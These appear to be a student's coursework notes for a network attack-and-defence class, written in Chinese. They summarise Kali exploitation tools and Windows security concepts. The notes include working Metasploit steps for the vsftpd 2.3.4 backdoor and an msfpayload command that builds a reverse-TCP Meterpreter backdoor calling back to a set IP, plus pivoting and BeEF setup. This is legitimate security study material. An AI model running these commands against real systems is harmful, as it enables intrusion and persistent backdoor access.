2017-2018-2 20179207 《網絡攻防技術》第七周作業
kali視頻(26-31)(漏洞利用)
漏洞利用之檢索與利用
漏洞利用工具集
1.searchsploit
Exploit Database->searchsploit
2.pattern create測試漏洞
armitage結合MSF進行利用
3.jboss-autopwn-linux/win
專門針對Jboss的漏洞利用工具4.ikat
自動化開啟,等待目標訪問中招。5.termineter
評估智能電表的安全性。
漏洞利用之metasploit基礎
1.啟動服務:
在kali中使用metasploit,需要先使用命令
service postgresql start
開啟PostgreSQL數據庫服務,使用命令
msfconsole
2.開啟metasploit服務,然後就可以完整的利用msf數據庫查詢exploit和記錄。
3.首先用nmap -sV掃描目標主機和端口上運行的軟件的版本。結果顯示目標主機運行著ftp服務器,且版本為vsftpd 2.3.4(此版本的vsftpd存在著漏洞,攻擊者可以遠程獲取目標主機的root權限)。
4.輸入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示進入到該路徑下,show options查看需要設置的相關項。提示需要設置RHOST和RPORT(端口默認為21)
5.接下來選擇payload,輸入命令set payload,按Tab鍵自動補齊攻擊載荷cmd/unix/interact,show options查看需要設置的相關項,設置結束後輸入exploit即可實施攻擊。
- 結果返回目標主機的shell,獲取了目標主機的root權限,可以輸入命令查看id、網絡配置等,攻擊也就可以順利實施。
漏洞利用之Meterpreter介紹
1.生成Meterpreter後門;打開MSF,開啟監聽(選擇exploit/multi/handler);在目標機器上執行door.exe;
2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
3.查看自己的IP地址,LHOST、LPORT為reverse_tcp的參數,可以在msf裏查看到(記得把服務啟動)
4.用use exploit/multi/handler來接收返回的連接
設置reverse_tcp的LHOST、LPORT參數
漏洞利用之Metasploit後滲透測試
- 1.查看跳板機的網卡
ifconfig
- 2.添加路由表
run autoroute -s 10.0.0.1
- 3.開socks代理
background 把session置於後臺
search socks 使用socks開代理
use auxiliary/server/socks4a
showoptions
exploit
- 4.通過background和sessions -i可以自由切換進入session
- 5.輸入run可以看到在meterpreter上可以做的很多命令
- 6.通過run post/可以看到後滲透測試的模塊
- 7.掃描內網信息
run arp_scanner -r 目標IP地址
內網端口轉發
upload lcx.exe c:\ 上傳到C盤根目錄
漏洞利用之beEf
1、在命令行下啟動
BeeFbeef-xss
2、用戶名和密碼都是beef
3、輸入測試網站,可以看到在線機器
4、對網站進行攻擊
5、Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;然後在Rider選項卡中的Forge Request編輯並發送想要發送的內容
6、BeEF默認是不加載Metasploit的,如果要使用Metasploit豐富的攻擊模塊,需要做些配置.
配置
首先打開beef xss目錄
cd /usr/share/beef-xss/
ls
nano config.yaml
編輯一下,可以看到有很多配置信息,包括用戶名、密碼都可以在這設置,在此將Metasploit的false修改為true
第七章 Windows操作系統安全防護
Windows操作系統的發展與現狀
Windows在桌面操作系統中占有非常高的市場份額,Windows XP系統在國內仍有大量的用戶
Windows操作系統基本結構
1、Windows操作系統內核基本模塊:Windows執行體、Windows內核體、設備驅動程序、硬件抽象層、Windows窗口與圖形界面接口內核實現代碼。
2、Windows操作系統在用戶態的代碼模塊:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。
3、核心機制:Windows進程和線程管理機制、Windows內存管理機制、Windows文件管理機制、Windows註冊表管理機制、Windows的網絡機制。
Windows系統的網絡結構,從OSI網絡參考模型的物理層到應用層,各層對應的Windows網絡組件模塊包括:
①網卡硬件設備驅動程序,位於OSI物理層
②NDIS庫及miniport驅動程序,位於OSI鏈路層
③TDI傳輸層,也被稱為網絡協議驅動,位於OSI網絡層與傳輸層
④網絡API DLL 及TDI客戶端,對應OSI會話層與表示層
⑥網絡應用程序與服務進程,對應OSI應用層
Windows操作系統的安全體系結構與機制
1、Windows安全體系結構
基於引用監控器(Reference Monitor)模型來實現基本的對象安全模型。最核心的是位於內核中的SRM(Security Reference Monitor)安全引用監控器,以及位於用戶態的LSASS安全服務。
2、Windows身份認證機制
分為用戶,用戶組,和計算機三大類。對於每個安全主體,以時間和空間上都全局唯一的SID安全標識符來進行標識。
Windows用戶密碼經過加密處理後被保存於SAM或者活動目錄AD中,其中本地用戶賬戶口令信息經過不可逆的128位隨機秘鑰Hash加密後存儲在SAM文件中。
Windows進程、GINA圖形化登錄窗口,與LSASS服務通過協作來完成本地身份認證過程。
3、Windows授權與訪問控制機制
Windows授權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。
Windows對於系統中所有需要保護的資源都抽象成對象,而對每個對象會關聯一個SD安全描述符(Security Descriptor)都會關聯一個對象描述符,有以下屬性組成:Owner SID、Group SID、DACL 自主訪問控制列表、SACL 系統審計訪問控制列表。
4、Windows安全審計機制
系統審計策略在本地安全策略中由系統管理員定義,來確定系統對哪些事件進行記錄。
5、Windows的其他安全機制
Windows安全中心中集成了對於保護Windows系統安全穩定運行最為關鍵的三項安全措施:防火墻,補丁自動更新,以及病毒防護。除了安全中心外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等。
6、Windows遠程安全攻防技術
Windows遠程攻擊技術可分為:遠程口令猜測與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶
7、Windows安全漏洞發現、利用與修補過程
安全漏洞公開披露信息庫:幾個知名的通用漏洞信息庫:CVE、NVD、SecurityFocus、OSVDB等。
8、針對特定目標的滲透測試攻擊過程:
①漏洞掃描測試
②查找針對發現漏洞的滲透代碼
③實施滲透測試
9、使用Metasploit軟件實施滲透測試
Metasploit是完全開源的滲透測試軟件。采用開發框架和模塊組件的可擴展模型,以Ruby語言編寫的Metasploit
Framework(MSF)庫作為整個軟件的基礎核心,為滲透測試組件的開發與測試提供平臺;模塊組件是真正實施滲透攻擊的代碼。
Metasploit提供了CLI、Console、Web和GUI四種不同的用戶交互接口,其中Console終端是比較常用的方式。
10、Windows遠程口令猜測與破解攻擊
- 遠程口令自猜測
- 遠程口令字交換通信竊聽與破解
- 遠程口令猜測與破解防範措施
11、Windows網絡服務遠程滲透攻擊
Windows操作系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務為MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。
- 針對NetBIOS網絡服務的著名漏洞及攻擊
- 針對SMB網絡服務的著名漏洞及攻擊
- 針對MSRPC網絡服務的著名漏洞及攻擊
- 針對Windows系統上微軟網絡服務的遠程滲透攻擊
- 針對Windows系統上第三方網絡服務的遠程滲透攻擊
12、網絡服務遠程滲透攻擊防範措施
- Windows本地安全攻防技術
- Windows本地特權提升
- 終極特權:Administrator或者Local System賬戶。從受限用戶權限嘗試獲得特權賬戶的攻擊技術也被稱為特權提升。
13、Windows敏感信息竊取
- Windows系統口令字密文提取技術
- Windows系統口令字破解技術
- 用戶敏感數據竊取
- 本地敏感信息竊取防範措施
14、Windows消蹤滅跡
- 關閉審計功能
- 清理事件日誌
- 針對消蹤滅跡的防範措施
15、Windows遠程控制與後門程序
- 命令行遠程控制工具
- 圖形化遠程控制工具
- 針對後門程序防範措施
2017-2018-2 20179207 《網絡攻防技術》第七周作業